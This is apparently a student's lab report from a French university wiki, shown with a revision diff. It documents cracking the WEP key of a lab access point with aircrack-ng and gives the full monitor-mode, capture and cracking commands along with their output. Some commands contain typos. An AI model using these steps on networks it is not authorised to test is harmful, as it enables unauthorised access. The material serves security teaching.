TP sysres IMA2a5 2021/2022 G6 : Différence entre versions

De Wiki d'activités IMA
Ligne 1 : Ligne 1 :
  
== '''5. Tests d’intrusion''' ==
+
== '''1. Tests d’intrusion''' ==
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''
+
'''1.1 Cassage de clef WEP d’un point d’accès WiFi'''
  
 
On branche tout d'abord le module USB Wi-Pi sur la machine.
 
On branche tout d'abord le module USB Wi-Pi sur la machine.

Version du 29 novembre 2021 à 09:15

1. Tests d’intrusion

1.1 Cassage de clef WEP d’un point d’accès WiFi

On branche tout d'abord le module USB Wi-Pi sur la machine.

On installe ensuite le paquetage aircrack-ng :

   apt-install aicrack-ng

On lit les interfaces disponibles grâce à la commande airmon-ng :

   root@zabeth03:~# airmon-ng
   PHY	   Interface	        Driver		    Chipset
   phy2    wlx40a5ef0f68cb	rt2800usb	    Ralink Technology, Corp. RT5370

On passe ensuite la carte Wi-Pi en mode moniteur, espion du réseau sans fil.

   root@zabeth03:~# airmon-ng start wlx40a5ef0f68cb
   PHY	Interface	Driver		Chipset
   phy2	wlx40a5ef0f68cb	rt2800usb	Ralink Technology, Corp. RT5370
   Interface wlx40a5ef0f68cbmon is too long for linux so it will be renamed to the old style (wlan#) name.
           (mac80211 monitor mode vif enabled on [phy2]wlan0mon
           (mac80211 station mode vif disabled for [phy2]wlx40a5ef0f68cb)

Le nom a été changé car l'ancien était trop long, l'interface s'appelle maintenant wlan0mon.

On peut obtenir le canal et l'adresse MAC de la cracotte qui nous intéresse (ici, la cracotte13) grâce à la commande :

   root@zabeth09:~# airmon-ng --encrypt wep wlan0mon
   BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
   04:DA:D2:9C:50:5C  -34        5       37    9   3  54e. WEP  WEP         cracotte13

On peut lire que la cracotte13 est sur le canal 3 et que son adresse MAC est 04:DA:D2:9C:50:5C.

On récupère ensuite dans un fichier "lcrack" toutes les données concernants la cracotte13 qui transitent sur le canal 3:

   airodump-ng -w lcrack --channel 3 --bssid 04:DA:D2:9C:50:5C wlan0mon

On attend d'avoir un nombre suffisant de données (environ 40000 pour ma part) :

   BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
   04:DA:D2:9C:50:5C  -38   0      3776    40132  115  3  54e. WEP  WEP         cracotte13

On lance ensuite la commande permettant de craquer le mot de passe grâce aux données récupérées :

   aircrack-ng lcrack.cap

On obtient rapidement la clé WEP :

                                                                                    Aircrack-ng 1.5.2 
                                                                       [00:00:00] Tested 829 keys (got 263651 IVs)
   KB    depth   byte(vote)
   0    2/  3   73(281856) D8(281088) 0E(278016) 7D(278016) DF(276736) 18(276480) 19(276480) 4F(276480) D7(275968) 5C(275712) 9D(275456) D2(275200) B8(274688) 4A(274432) 76(274432) 
   1    5/  1   38(282368) 91(278784) DE(276992) 80(276736) E0(276736) 66(276480) 4C(275456) 89(275456) D9(275456) 98(275200) 53(274944) D7(274944) 39(274432) D3(274432) 1D(274176) 
   2    2/  9   37(285696) 90(280832) CF(280064) FC(278272) 03(278016) 6E(278016) DE(278016) DB(277760) FD(277760) C2(277504) 60(276480) 62(276224) 73(275968) CB(275968) DA(275456) 
   3    0/  1   14(373248) A1(285952) F7(284672) F4(284416) AE(283648) FC(281344) 5C(280832) F9(279552) 55(279040) 29(278528) 03(277248) 06(276736) 53(276480) 66(275456) B6(275456) 
   4   32/  4   F3(273152) 12(272896) 9A(272896) 45(272640) E2(272640) 4E(272384) B4(272384) 65(271872) 23(271616) 89(271360) 1C(270848) 1F(270592) B9(270592) FC(270592) 06(270336) 
            KEY FOUND! [ 12:34:56:78:9A:BC:14:CB:A9:87:65:43:21 ]
   Decrypted correctly: 100%